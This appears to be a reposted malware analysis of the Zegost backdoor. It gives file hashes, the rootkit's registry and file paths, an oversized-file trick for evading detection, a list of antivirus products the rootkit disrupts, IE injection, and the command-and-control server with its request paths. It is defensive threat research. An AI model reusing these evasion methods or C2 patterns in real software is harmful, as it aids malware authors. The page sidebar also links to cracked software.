LEFT SIDEBAR AD

Hidden in mobile, Best for skyscrapers.

Zegost - analysis of the Chinese backdoor

1 decade ago 120
BOOK THIS SPACE FOR AD
ARTICLE AD
Interesting features:
- Rootkit on board;
- Dropped driver has ~100MB size on disk;
- Contains AVKill code;
- Injected DLL as a payload.

https://twitter.com/artem_i_baranov/status/283497092427694080

Original dropper fingerprints:

SHA256: 030340a429180da10df3dee1092701aa3b9e38dac45445badb457de44c198061
SHA1: ecb9626b9a2cd0c75a078f1c17cbead251380ba6
MD5: 48c093b0e24d65838e1ee0f5b7b4337e
File size: 98304 bytes

Dropper is detected by almost all vendors:

Resource section is interesting, because it stores the rootkit driver in packed state (APLib).
Point of driver loading by dropper is trivial - using of ntdll!ZwLoadDriver.
For loading the driver the first time, it creates the same file and service name.

\Registry\Machine\System\CurrentControlSet\Services\HideKey
C:\recycler\hidekey.txt


To mislead some static detectors and analyzing tools, the trojan uses the trick of dropping rootkit with total file size ~100MB. Actual size ~70KB.

A similar technique is used in Darkmegi rootkit, but the total size is smaller.

Resource with 104 number in dropper contains reg-file for setup driver.
Point of its loading.


To ensure the survival after reboot, the dropper creates AppSvcHlp.sys - a copy of hidekey.txt in standard drivers directory.

Driver/rootkit:

SHA256: 061e60a81dd01207b08f5243eb54fb9fe2e492d51e9e691f18ae9581607a625e
SHA1: 19889145b193926b8fa2827c5eff966b450b3a19
MD5: 2d613204d44fb0455ef0fa5384d5352c
File size: 75776 bytes

Driver body contains malicious dll [antivshlp32.dll] and has main purpose dll installation:


Driver targeted to disruption a lot of AV products: Qihoo 360, Kaspersky AV, ESET Nod32,  Malwarebytes Anti-Malware.


DLL:

SHA256: bf876fef476ec8d7e712422d0411099834810747e447102818f0af93591b53eb
SHA1: e7356ab76d223ce18845942bf62cf55123b9b686
MD5: e72b0a5d85f1e9d3413745d2b696b714
File size: 40960 bytes





Autorun from:

DLL has on board another exe-file injected into IE. This exe being stored in resource section and packed with APLib.
Injection chronicles:


Injected module - final payload:


SHA256: 5577a888fa4477c47a3bf3159b5e46de16a75582ba4888d38b5f2a8b527a9c18
SHA1: dae0f132166d008878491baa65424e221792669f
MD5: 8e8d86259b9e94a8febc36407964cfe3
File size: 14336 bytes

Performs response to remote server from context of shadow IE:
Remote server - hxxp://iyy.conimes.com http://whois.domaintools.com/conimes.com

Communication:
With help of:

Request:
http://iyy.conimes.com/cgi/online.asp?hostname=ComputerName&httptype=[1][not httptunnel]

Other requests:

/cgi/binup.asp
/cgi/textup.asp
http://%s/cgi/%s.txt
http://%s/cgi/command.asp?hostname=%s&command=test&del=delfile
http://%s/cgi/update.exe

posted by https://twitter.com/artem_i_baranov
Read Entire Article
  3. Zegost - analysis of the Chinese backdoor

Related

Suspects behind $230 million cryptocurrency theft arrested in Miami

Suspects behind $230 million cryptocurrency theft arrested in Miami

CISA warns of actively exploited Apache HugeGraph-Server bug

CISA warns of actively exploited Apache HugeGraph-Server bug

The final post

The final post

Microsoft Edge will flag extensions causing performance issues

Microsoft Edge will flag extensions causing performance issues

Tor anonymity compromised by law enforcement. Is it still safe to use?

Tor anonymity compromised by law enforcement. Is it still safe to use?

Tor says it’s "still safe" amid reports of police deanonymizing users

Tor says it’s "still safe" amid reports of police deanonymizing users

Trending

1. FC Barcelona
2. Barcelona
3. Arsenal
4. Sanju Samson
5. Beef tallow
6. PM Modi
7. England vs Australia
8. Score
9. Rohit Sharma
10. Sports

Popular

1-click RCE in Electron Applications

1-click RCE in Electron Applications

Install waybackurls on Kali Linux

Install waybackurls on Kali Linux

Microsoft Office Professional Plus 2019 (x64 & x86) Multilingual + Pre-Activated

Microsoft Office Professional Plus 2019 (x64 & x86) Multilingual + Pre-Activated

Over 40 Apps With More Than 100 Million Installs Found Leaking AWS Keys

Over 40 Apps With More Than 100 Million Installs Found Leaking AWS Keys

Install DalFox on Kali Linux

Install DalFox on Kali Linux

Adobe Master Collection CC 2022 v25.08.2022 (x64) Multilingual Pre-Activated

Adobe Master Collection CC 2022 v25.08.2022 (x64) Multilingual Pre-Activated

Maxon CINEMA 4D Studio S22.123 (x64) Multilingual + Crack

Maxon CINEMA 4D Studio S22.123 (x64) Multilingual + Crack

‘We are not motivated by profits’ – Open Bug Bounty maintainers on finding a niche in the crowdsourced AppSec market

‘We are not motivated by profits’ – Open Bug Bounty maintainers on finding a niche in the crowdsourced AppSec market

Just Gopher It: Escalating a Blind SSRF to RCE for $15k

Just Gopher It: Escalating a Blind SSRF to RCE for $15k

SketchUp Pro 2020 v20.2.172 (x64) Multilingual + Patch

SketchUp Pro 2020 v20.2.172 (x64) Multilingual + Patch

BOOK THIS SPACE FOR AD
RIGHT SIDEBAR BOTTOM AD
Bengali (Bangladesh) Bengali (Bangladesh) · English (United States) English (United States) ·
About Us · Terms & Condition · Contact Us
© Security Alert 2024. All rights are reserved